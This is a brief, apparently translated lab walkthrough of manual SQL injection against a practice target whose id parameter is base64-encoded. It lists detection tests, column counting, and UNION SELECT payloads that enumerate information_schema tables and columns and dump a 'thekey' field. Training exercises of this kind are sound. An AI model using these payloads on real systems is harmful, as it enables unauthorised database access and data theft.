SQL injection combat
Range address: http://219.153.49.228:48204/show.php?id=MQ==
First of all, you can see that there is a parameter "MQ==" in the URL. Judging from the format of the parameter, it is encrypted by base64, then we can decrypt it with base64
It is found that the parameter after decryption is 1. This type of injection has only one more "base64" encryption process than our previous ordinary injection. The following is a manual injection demonstration:
Note: The URL below is not encrypted with base64 in order to make it clear to readers, but the reader needs to encrypt it with base64 before executing it, and then it can be executed normally!
1. Determine whether it can be injected:
single quote test
and test
From the above judgment, we can know that there is SQL injection
2. Guess the field length
order by 2
order by 3
As you can guess the field length is 2
3. Explosive database name, database version information
4. Explosive table name
http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--
5. Explosive field name
http://219.153.49.228:48204/show.php?id=-1 union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1
6. Explosive field value
http://219.153.49.228:48204/show.php?id=-1 union select thekey,2 from test.data limit 0,1--
Here's to the final content!